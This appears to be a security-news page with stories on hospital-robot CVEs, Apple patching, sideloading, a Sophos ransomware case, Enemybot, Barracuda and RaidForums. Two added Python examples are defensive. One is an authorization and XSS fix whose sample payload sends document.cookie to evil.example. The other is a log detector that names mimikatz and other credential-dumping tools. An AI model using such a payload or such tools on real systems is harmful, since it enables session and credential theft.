More stories

  •

    Critical vulnerabilities uncovered in hospital robots

    Vendor Aethon has patched five critical vulnerabilities in hospital robots used to deliver medical supplies.

    The world of health-related cybersecurity issues is still relatively untouched. In recent years, we’ve seen the impact of ransomware outbreaks in hospitals, software vulnerabilities including some that could, in theory, stop a pacemaker from working, and countless patient data leaks at providers worldwide. However, unless there’s a clear-cut financial benefit, many cyberattackers will ignore medical devices in favor of hitting businesses likely to provide them with illicit revenue. This doesn’t mean that vendors, or defenders, should ignore vulnerabilities and security issues surrounding medicine, especially as digital health, personalized medicine, and remote care continue to develop.

    Medical devices can fall short of adequate security measures, as recently revealed in Cynerio’s public disclosure of Jekyllbot:5 (.PDF), five critical vulnerabilities in Aethon TUG robots.

    Read on: Black Hat: How your pacemaker could become an insider threat to national security

    Aethon’s mobile robots are autonomous devices used by hundreds of hospitals to perform basic, repetitive tasks that augment existing workforces. TUGs run errands including medicine delivery, cleaning, and dropping off linen and other supplies to healthcare professionals. Stanford is one healthcare provider that uses the robots for drug deliveries; the robots move at 2mph along pre-determined routes.

    According to Cynerio, the five vulnerabilities allow attackers to take over a robot’s activities, including taking photos, snooping on the hospital in real time via camera feeds, accessing patient records, and disrupting or blocking drug delivery, all of which could impact patient care. In addition, the team says the bugs could be used to hijack user sessions or “take control of the robot’s movement and crash them into people or objects, or use them to harass patients and staff.”

    The vulnerabilities, now assigned CVEs, are:

      • CVE-2022-1066 (CVSS 8.2): Missing authorization checks, allowing unauthenticated attackers to add or modify existing user accounts
      • CVE-2022-26423 (CVSS 8.2): Missing authorization checks, allowing free access to hashed credentials
      • CVE-2022-1070 (CVSS 9.8): Failure to verify end users, permitting attackers to access the TUG Home Base Server and take control of connected robots
      • CVE-2022-27494 (CVSS 7.6): User-controlled input is not neutralized, allowing XSS attacks to trigger on report pages
      • CVE-2022-1059 (CVSS 7.6): User-controlled input is not neutralized before being shown in the web portal, so Fleet page users may be subject to reflected XSS attacks

    The critical flaws were found during an audit on behalf of a client healthcare provider. While Cynerio’s customer had not connected their robots to the internet, and they were therefore safe from active exploitation, the cybersecurity firm said “several” hospitals had internet-connected robots that could be remotely controlled from the Cynerio Live research lab.

    The vendor was notified of the vulnerabilities through the US Cybersecurity and Infrastructure Security Agency (CISA). Cynerio worked with Aethon to develop suitable patches, and the latest version of TUG firmware contains fixes. In addition, Aethon deployed firewall updates at customer hospitals to restrict public access.

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0
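    The two bug classes that dominate the Jekyllbot:5 list, a user-management endpoint with no authorization check (the CVE-2022-1066 class) and a report page that reflects user input without neutralizing it (the CVE-2022-27494 / CVE-2022-1059 class), are easier to recognise side by side with their fixes. The block below is an added, generic illustration written for this page; the handlers, the role names and the account table are hypothetical and are not Aethon’s code or anything Cynerio published.

```python
"""Generic illustration of two bug classes from the JekyllBot:5 CVE list:
a user-management handler with no authorization check and a report page
that reflects user input unescaped. Added example; the handlers, roles and
user table are hypothetical and are not Aethon's code."""
import html


def make_users():
    # Hypothetical account table, name -> role. Constructed for the example.
    return {"admin": "admin", "nurse1": "operator"}


# ---- Missing authorization check: before and after ------------------------

def vulnerable_set_role(users, session, target, role):
    """Modifies accounts for whoever reaches the endpoint; the session is
    never inspected, so an unauthenticated caller can add or change users."""
    users[target] = role
    return 200, f"updated {target}"


def hardened_set_role(users, session, target, role):
    """Authenticate (a session for a known user), then authorize (admin role
    only), then validate the input, and only then touch the account table."""
    if not session or session.get("user") not in users:
        return 401, "authentication required"
    if users[session["user"]] != "admin":
        return 403, "forbidden"
    if role not in ("admin", "operator"):
        return 400, "invalid role"
    users[target] = role
    return 200, f"updated {target}"


# ---- Reflected XSS: before and after --------------------------------------

def vulnerable_report_page(query):
    """Reflects the search term straight into HTML; <script> in the query runs
    in the browser of whoever opens the crafted report link."""
    return f"<h1>Report results for {query}</h1>"


def hardened_report_page(query):
    """Escapes on output so the same payload renders as text, not markup."""
    return f"<h1>Report results for {html.escape(query, quote=True)}</h1>"


if __name__ == "__main__":
    users = make_users()
    # Unauthenticated caller (session=None) adds an admin account.
    print(vulnerable_set_role(users, None, "attacker", "admin"))
    print(hardened_set_role(users, None, "attacker2", "admin"))
    print(hardened_set_role(users, {"user": "nurse1"}, "x", "admin"))
    payload = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    print(vulnerable_report_page(payload))
    print(hardened_report_page(payload))
```

    The ordering in the hardened handler matters: authentication before authorization before input validation, so an unauthenticated request never reaches the code that writes to the account table. Output escaping is the fix for the reflected XSS; a Content-Security-Policy header is worthwhile defence in depth but does not replace it.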

  •

    Why quickly patching your iPhones and Macs is more important than ever

    Apple products are secure and don’t get malware or hacked. This is a dangerous myth that continues to circulate despite being total garbage.


    In fact, the number of vulnerabilities in Apple’s products is rapidly catching up with companies like Google and Microsoft.

    A report by Atlas VPN (based on data from Telefonica Tech Cybersecurity) shows that vulnerabilities found in Apple products surged by 467% during the second half of 2021 to 380, a dramatic rise from the 67 uncovered during the first half of 2021. That puts the number of vulnerabilities found in Apple products in the latter six months of 2021 a stone’s throw away from the top generators of vulnerabilities: Google (511 vulnerabilities) and Microsoft (428 vulnerabilities).

    [Chart: Companies with the most vulnerabilities in 2021 H1 and H2. Source: Atlas VPN/Telefonica Tech]

    According to the report, a good chunk of Apple’s vulnerabilities relate to the Safari web browser and its various operating systems, while the majority of Microsoft’s vulnerabilities are associated with Windows OS versions, Office tools, and the Microsoft Edge browser, and Google’s are mostly in the Android operating system and the Chrome browser.

    So, what does this mean for Apple users?

    First, let go of the perilous myth that your Apple gadgets are immune to hacking and malware. They’re not invulnerable.

    Next, get serious about patching your iPhones, Macs, iPads, and other Apple products. Do it quickly, and check often for any updates you might have missed.

    Finally, be aware of when your Apple products stop receiving security updates. Once this point is reached, your devices can start to accumulate vulnerabilities at a rapid pace. As painful as it is, keeping an eye on replacing obsolete devices is essential to securing your digital information.

  •

    Sideloading iPhone apps creates a security risk says Apple's Tim Cook, so don't force us to support it

    Apple chief Tim Cook has hit out at proposed competition laws that would force it to allow apps to be downloaded from other app stores, something known as ‘sideloading’, which he warned could undermine security. Cook on Tuesday used his speech at the International Association of Privacy Professionals (IAPP) summit to express Apple’s alarm about US and European proposals that could force it to let users sideload apps on the iPhone outside of the App Store.

    Two competition proposals that do threaten Apple’s services-oriented business are the EU’s Digital Markets Act (DMA) and America’s Open App Markets Act. Both target “gatekeepers” such as Apple and Google. The US proposal, which as of February gained broad support from US lawmakers, aims to require sideloading of apps and remove the need for developers to use Apple’s and Google’s in-app payment systems. Meanwhile, members of the European Parliament agreed to support the DMA last month, which would require messaging platforms from Google, Apple, Meta and others to work together, just as SMS works today. Apple has on multiple occasions argued against sideloading because it’s a malware risk to iPhones, and it isn’t fond of the DMA either, for security reasons. Google is worried the DMA will “reduce innovation and the choice available to Europeans”.

    Cook said Apple is concerned that these competition regulations put users’ privacy and security at risk. Apple is committed to “protecting people from a data industrial complex built on a foundation of surveillance,” he said, echoing a phrase he used in 2018 when petitioning US federal lawmakers to create a federal privacy law that emulates Europe’s General Data Protection Regulation (GDPR).
    “We have long been supporters of the GDPR … and we continue to call for a strong privacy law in the United States,” said Cook. “We are deeply concerned by regulations that would undermine privacy and security in service of some other aim.”

    “Here in the United States, policy makers are taking steps that would force Apple to let apps on the iPhone that would circumvent the App Store through a process called sideloading. That means data-hungry companies would be able to avoid our privacy rules and once again track users against their will.”

    “It would also potentially give bad actors a way around the comprehensive security protections we put in place, putting them in direct contact with our users. And we have already seen the vulnerability that that creates on other companies’ devices.”

    He noted that during the early part of the pandemic, smartphone users were downloading apps posing as legitimate COVID-19 tracing apps that turned out to be ransomware.

    “But these victims weren’t iPhone users because the scheme directly targeted those that could install apps from websites that lacked the App Store’s defenses. Proponents of this legislation argue that no harm would be done by simply giving users the choice. But taking away a more secure option will leave users with less choice,” said Cook.

  •

    Clueless hackers spent months inside a network and nobody noticed. But then a ransomware gang turned up

    Novice hackers who didn’t know what they were doing spent months inside a government agency network without being detected, before higher-skilled attackers came in after them and launched a ransomware attack.

    Analysis of the incident at an unspecified US regional government agency by cybersecurity researchers at Sophos found that the amateur intruders left plenty of indicators that they were in the network. Yet despite a lack of subtlety and the trail they left behind, they weren’t detected, because of what Sophos researchers describe as “strategic choices” made by the IT team that made life easy for them.

    The attackers initially broke into the network using one of the most popular techniques deployed by cyber criminals: obtaining the password for an internet-facing Windows Remote Desktop Protocol (RDP) service exposed on a firewall. It’s uncertain how the password itself was obtained, but common methods include brute-force attacks and phishing emails. The attackers also got lucky, because the compromised RDP account wasn’t only a local admin on the server but also had domain administrator permissions, allowing it to be used to create admin accounts on other servers and desktops.

    But despite all this power, the intruders didn’t seem to know what to do once they had access to the network. Analysis of activity logs suggested they used the servers they controlled to run Google searches for hacking tools, then followed pop-up ads to pirated software downloads. Researchers say this left the servers riddled with adware, with the hackers unintentionally infecting the servers they controlled with malware. The victim organisation didn’t notice any of this was happening.

    SEE: Cloud security in 2022: A business guide to essential tools and best practices

    Log data suggests that the attackers regularly disappeared for days at a time before returning to look around the network, occasionally creating new accounts to gain access to other machines. This continued for months, with the attackers seemingly learning how to hack networks as they went along, as well as installing cryptomining malware on the compromised servers.

    “This was a very messy attack,” says Andrew Brandt, principal security researcher at Sophos. “They then seemed unsure of what to do next.”

    But after four months, the attacks suddenly became more focused and more sophisticated. Following a three-week hiatus with no activity, attackers remotely connected and installed the credential-dumping tool Mimikatz in order to gain access to additional usernames and passwords, storing them all in a text file on the desktop of admin-level accounts they had created. These attackers also looked to remove the coinminer that had previously been installed and attempted to uninstall antivirus software on endpoints.

    It’s likely that the higher sophistication of the attacks means new intruders had gained access to the network. “When you see an abrupt change in both goals and skill level in an attack like this, in which the original ingress point is at that point still open, as it was in this case, the safe bet is that another attacker has entered the space,” says Brandt.

    It was at this point that the IT department noticed something strange was happening and took servers offline to investigate. But in order to do this, they also disabled some cybersecurity protections, and the attackers took advantage. The intruders repeatedly dumped credentials and created new accounts in order to continue their attacks. The logs were also wiped repeatedly, in what could have been an attempt to cover their tracks.

    SEE: Cybersecurity: Let’s get tactical (ZDNet special report)

    The new, much more sophisticated attackers also stole a set of sensitive files as they worked towards the apparent end goal of a ransomware attack, which fully encrypted some of the machines on the network with LockBit ransomware.

    But the attack didn’t affect all the machines, and the IT department, with the aid of Sophos analysts, was able to clean up and restore services.

    However, the whole attack could have been prevented if better cybersecurity practices had been in place, as attackers were able to enter and move around the network freely without being detected, particularly because measures were implemented to improve efficiency rather than to improve cybersecurity, even when it was clear the organisation was under attack. “Disabling features like tamper protection on endpoint security software seemed to be the critical lever the attackers needed to completely remove protection and complete their jobs without hindrance,” researchers said in the blog post.

    Applying multi-factor authentication to user accounts would have helped prevent them from being exploited, and login notifications would have provided a warning that something suspicious was under way. Meanwhile, properly monitoring the network would have indicated something was wrong when the attackers were snooping around, and certainly before another set of hackers broke in and laid the foundation for a ransomware attack.

    “Defenders have to keep watch on their network, whether in-house or through a managed-services partner. Keeping an eye out for smaller oddities or incidents – even something as simple as someone logging into a system at odd hours or from an unusual location – can make the difference,” said Brandt.
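    Every phase of this intrusion left the kind of “smaller oddity” Brandt describes in the Windows Security log: a burst of failed RDP logons followed by a success, a logon at an odd hour from an unfamiliar address, a new account, a credential-dumping tool launched, and the audit log being cleared. The script below is an added example written for this page, not Sophos’ tooling or anything from the incident report. It runs simple detection rules over a handful of constructed, simplified event lines; the log format, the business-hours window, the brute-force threshold, the list of “known” RDP sources and the tool keyword list are all assumptions.

```python
"""Detect the 'small oddities' from the Sophos write-up in a constructed,
simplified Windows Security event log: RDP brute force, RDP logons at odd
hours or from unknown sources, new accounts, credential-dumping tools and
audit-log clearing. Added example; thresholds and keyword lists are assumed."""
from collections import Counter
from datetime import datetime

# Constructed sample (not from the incident): time|event_id|user|src_ip|detail
# 4625 = failed logon, 4624 = logon, 4720 = account created,
# 4688 = process created, 1102 = audit log cleared. LogonType=10 is RDP.
SAMPLE_LOG = """\
2022-01-10T02:51:03|4625|administrator|203.0.113.7|LogonType=10
2022-01-10T02:51:04|4625|administrator|203.0.113.7|LogonType=10
2022-01-10T02:51:05|4625|administrator|203.0.113.7|LogonType=10
2022-01-10T02:51:06|4625|administrator|203.0.113.7|LogonType=10
2022-01-10T02:51:07|4625|administrator|203.0.113.7|LogonType=10
2022-01-10T02:51:08|4624|administrator|203.0.113.7|LogonType=10
2022-01-10T02:55:40|4720|administrator|203.0.113.7|NewAccount=svc_backup2
2022-01-10T09:14:00|4624|jsmith|10.0.5.21|LogonType=10
2022-05-02T23:07:12|4688|svc_backup2|10.0.5.9|Process=C:\\Users\\Public\\mimikatz.exe
2022-05-02T23:09:30|1102|svc_backup2|10.0.5.9|AuditLogCleared
"""

KNOWN_RDP_SOURCES = {"10.0.5.21", "10.0.5.9"}        # assumed: approved jump hosts
BUSINESS_HOURS = range(8, 18)                         # assumed: 08:00-17:59 local
BRUTE_FORCE_THRESHOLD = 5                             # assumed: failures per source
CRED_DUMP_TOOLS = ("mimikatz", "procdump", "sekurlsa")  # assumed keyword list
RDP_LOGON_TYPE = "LogonType=10"


def parse_events(text):
    """Parse the pipe-delimited sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, src, detail = line.split("|", 4)
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "user": user, "src": src, "detail": detail})
    return events


def detect(events):
    """Return (rule, subject, when) alerts in log order."""
    alerts = []
    failures = Counter()  # failed RDP logons per source address
    for e in events:
        when = e["time"].strftime("%Y-%m-%d %H:%M")
        if e["id"] == 4625 and RDP_LOGON_TYPE in e["detail"]:
            failures[e["src"]] += 1
            if failures[e["src"]] == BRUTE_FORCE_THRESHOLD:
                alerts.append(("rdp_bruteforce", e["src"], when))
        elif e["id"] == 4624 and RDP_LOGON_TYPE in e["detail"]:
            if e["src"] not in KNOWN_RDP_SOURCES:
                alerts.append(("rdp_unknown_source", e["src"], when))
            if e["time"].hour not in BUSINESS_HOURS:
                alerts.append(("rdp_odd_hours", e["user"], when))
            if failures[e["src"]] >= BRUTE_FORCE_THRESHOLD:
                # A success right after a burst of failures is the brute force paying off.
                alerts.append(("rdp_success_after_bruteforce", e["src"], when))
        elif e["id"] == 4720:
            alerts.append(("account_created", e["detail"], when))
        elif e["id"] == 4688 and any(k in e["detail"].lower() for k in CRED_DUMP_TOOLS):
            alerts.append(("credential_dump_tool", e["detail"], when))
        elif e["id"] == 1102:
            alerts.append(("audit_log_cleared", e["user"], when))
    return alerts


if __name__ == "__main__":
    for rule, subject, when in detect(parse_events(SAMPLE_LOG)):
        print(f"{when}  {rule:30s} {subject}")
```

    On the sample, every line except the daytime logon by jsmith from an approved host raises an alert. Note that event 1102 is itself the last thing a log-clearing attacker cannot suppress from a forwarded log, which is why these rules should run on a collector or SIEM, not on the endpoint being cleared.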

  •

    Developer trends, zero-day risks, 5G speeds, and more: Tech research roundup

    According to Google Project Zero’s zero-day tracker, there were 25 browser zero-days patched last year, of which 14 were for Chrome, six were for Safari’s WebKit engine, and four were for Internet Explorer. In 2020, there were just 14 browser zero-day flaws.

    SEE: Google: We’re spotting more Chrome browser zero-day flaws in the wild. Here’s why

  •

    Enemybot: a new Mirai, Gafgyt hybrid botnet joins the scene

    A new botnet is targeting routers, Internet of Things (IoT) devices, and an array of server architectures.

    On April 12, cybersecurity researchers from FortiGuard Labs said the new distributed denial-of-service (DDoS) botnet, dubbed Enemybot, borrows modules from the infamous Mirai botnet’s source code, alongside Gafgyt’s.

    The Mirai botnet was responsible for a massive DDoS attack against Dyn in 2016. Mirai’s source code was leaked online in the same year, and even now botnets built from parts of it continue to be weapons of choice for threat actors. Gafgyt/Bashlite code is also public, and according to FortiGuard, the new Enemybot employs elements of both botnets in its attacks, joining the likes of Okiru, Satori, and Masuta.

    Keksec is thought to be the botnet’s operator. Keksec, also known as Necro or Freakout, is a prolific threat group connected to DDoS assaults, cyberattacks against cloud service providers, and cryptojacking campaigns. According to Lacework, the threat group is also the developer of a Tsunami DDoS malware variant called “Ryuk,” although this is not to be confused with the Ryuk ransomware family.

    Enemybot was first discovered in March 2022. The botnet uses Mirai’s scanner module and bot killer, which checks the processes running in memory and terminates any competitors based on a selection of keywords. The team describes the botnet as an “updated and rebranded” variant of Gafgyt_tor due to its heavy reliance on botnet functions sourced from Gafgyt’s codebase.

    Enemybot will attempt to compromise a wide range of devices and architectures through techniques including brute-force attacks and vulnerability exploitation. Seowon Intech, D-Link, Netgear, and Zhone routers are targeted, as well as iRZ mobile routers and misconfigured Android devices. The threat actors will try to exploit both old, patched vulnerabilities and newer security issues such as Log4j. When it comes to architecture, Enemybot isn’t too picky: desktop and server systems on arm and arm64, as well as Darwin and BSD, are targeted, alongside many others.

    “This mix of exploits targeting web servers and applications beyond the usual IoT devices, coupled with the wide range of supported architectures, might be a sign of Keksec testing the viability of expanding the botnet beyond low-resource IoT devices for more than just DDoS attacks,” the researchers say.

    Once the malware has compromised a device or server, a text file is dropped with cleartext messages, such as: “ENEMEYBOT V3.1-ALCAPONE – hail KEKSEC, ALSO U GOT haCkED MY [REDACTED] (Your device literally has the security of a [shitty device] / [smart doorbell]).” Enemybot then fetches the binary matching the target architecture and executes a range of DDoS-related commands. The malware can also use a range of obfuscation methods to hinder analysis and hide its presence. The botnet’s command-and-control (C2) server is hosted on a .onion domain, only accessible via the Tor network.

    Enemybot is still under active development. “We expect that more updated versions will be distributed in the wild soon,” the researchers say. “FortiGuard Labs will keep monitoring this botnet.”

  •

    Barracuda Networks changes hands with purchase by global investment firm KKR

    Barracuda Networks has been acquired by KKR, an investment outfit taking the company over from past owner Thoma Bravo.

    Founded in 2003, Barracuda is a developer of cybersecurity solutions, including email protection, app and cloud defenses, data management, and network security. Products include Secure Access Service Edge (SASE) offerings, threat detection and response, and data inspection. The company caters to approximately 200,000 customers worldwide and focuses on small to medium-sized businesses.

    The cybersecurity firm recently captured the interest of KKR, an investment company that markets itself as offering “alternative asset management.” The funds managed by KKR include hedge funds, private equity, credit, and real assets. The acquisition was announced on April 12.

    Private equity firm Thoma Bravo purchased Barracuda in 2017 for $1.6 billion. At the time, the sale was intended to increase Barracuda’s growth and maximize shareholder value; four years after being listed on the NYSE, Barracuda (CUDA) went private. The financial terms of the new deal have not been disclosed. However, the companies say that since Thoma Bravo’s acquisition, Barracuda has grown to “over $500 million” in revenue. Reuters reports that the acquisition is worth approximately $4 billion, including debt.

    KKR says that Barracuda’s growth remains a priority and that the investment outfit will support its expansion in areas including detection and response and SASE. “We continue to see cybersecurity as a highly attractive sector and are excited to back a clear leader in the space,” commented John Park, Head of Americas Technology Private Equity at KKR. “Given its proven track record of growth and innovation, we believe that Barracuda has the right team and model to capture business in this growing market.” The transaction is expected to close by the end of 2022, subject to customary conditions.

  •

    Hacking forum RaidForums shut down and founder arrested in global police operation

    The RaidForums hacker forum, used by cybercriminals primarily to buy and sell stolen databases, has been shut down and its domains seized by US law enforcement as part of an operation coordinated by Europol that involved law enforcement agencies across numerous countries.

    “The takedown of this online market for the resale of hacked or stolen data disrupts one of the major ways cybercriminals profit from the large-scale theft of sensitive personal and financial information,” US Justice Department (DOJ) Assistant Attorney General Kenneth Polite Jr said in a statement. Prior to the forum’s seizure, hundreds of databases of stolen data containing more than 10 billion unique records for individuals had been offered for sale, the DOJ said.

    The global enforcement action, labelled Operation Tourniquet, saw Europol, the UK National Crime Agency (NCA), and the US Justice Department, along with Portuguese, Swedish, and Romanian law enforcement officials, work together to close the forum. The various countries worked together on this operation for at least a year through Europol’s Joint Cybercrime Action Taskforce, where officials exchanged information to enable investigators to define the different roles played by the individuals who ran the marketplace, Europol said.

    US charges have also been laid against RaidForums’ Portuguese founder and chief administrator, Diogo Santos Coelho, who was arrested in the UK in January. Coelho is accused of running the forum, which entailed establishing a membership scheme where users of the site could pay for access to chatrooms that allowed the exchange of links, photographs, and data linked to cybercrime. Among the charges are conspiracy, access device fraud, and aggravated identity theft in connection with his role as chief administrator of RaidForums. Coelho is currently in UK custody and could be extradited to the US to face these charges, pending legal proceedings.

    Two of Coelho’s accomplices have also been arrested. One of them, a 21-year-old UK citizen, was arrested by the NCA in March but has since been released under investigation. At the time of this unnamed individual’s arrest, police officers seized £5,000 in cash and thousands in US dollars, and froze crypto assets worth more than half a million dollars.